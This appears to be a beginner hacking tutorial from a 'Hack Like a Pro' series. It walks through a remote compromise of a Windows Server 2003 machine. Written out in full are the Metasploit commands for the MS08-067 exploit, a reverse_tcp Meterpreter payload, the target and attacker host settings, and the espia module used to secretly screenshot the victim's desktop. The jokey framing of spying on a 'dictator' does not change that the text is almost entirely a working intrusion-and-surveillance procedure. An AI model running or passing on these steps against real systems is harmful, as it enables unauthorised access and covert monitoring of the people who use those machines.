Hack Like a Pro: How to Remotely Grab a Screenshot of Someone's Compromised Computer
Welcome back, my newbie hackers!
We need to keep a close eye on him, so in this hack, we'll install a script to periodically take a screenshot of whatever he's doing on his computer. That way we can monitor his activities and hopefully keep the world safe.
So, let's fire up Metasploit and get after this malignant, maniacal, and malicious dictator.
First, let's select an exploit to use. Since he's using a Windows Server 2003 system, I like to use the MS08_067_netapi exploit, so let's type:
- msf > use exploit/windows/smb/ms08_067_netapi
To simplify our screen captures, we'll need to use Metasploit's Meterpreter payload. Let's load it into our exploit by typing:
- msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
Next, we need to set our options. At this point, I like to use the "show options" command to see which options are required to run this hack.
- msf exploit(ms08_067_netapi) > show options
As you can see, we need to set the RHOST (the victim's IP address) and the LHOST (our own IP address, the attacker's). After doing this, we should be ready to take over his system.
- msf exploit(ms08_067_netapi) > set RHOST 192.168.1.108
- msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
Now, if we did everything correctly, we should be able to exploit the dictator's computer and put the Meterpreter on it, giving us total control of his computer.
- msf exploit(ms08_067_netapi) > exploit
As you can see, we received a Meterpreter command prompt and we're ready to roll!
Before we begin work on the malicious dictator's computer, let's find out which process ID (PID) our Meterpreter session is running under. Type:
- meterpreter > getpid
As you can see from the screenshot, we are running under PID 932 on the dictator's computer. Now let's check which process that is by listing all running processes with their corresponding PIDs. Type:
- meterpreter > ps
We can see that PID 932 corresponds to the svchost.exe process. Since we're running inside a process with active desktop permissions, we're good to go. If not, we would have to migrate to a process that does have active desktop permissions.
Now all we need to do is activate a built-in Meterpreter script called espia. Simply type:
- meterpreter > use espia
Running this script simply installs espia on the bad guy's computer. Now we can grab a screenshot of his computer by typing:
- meterpreter > screengrab
When we do this, the espia script grabs a screenshot of the dictator's current desktop, saves it in our root user's directory, and displays a copy for us.
As we can see above, we've successfully grabbed a screenshot of our bad boy's computer. Looks like he's up to no good again, checking on those Twinkies that are en route.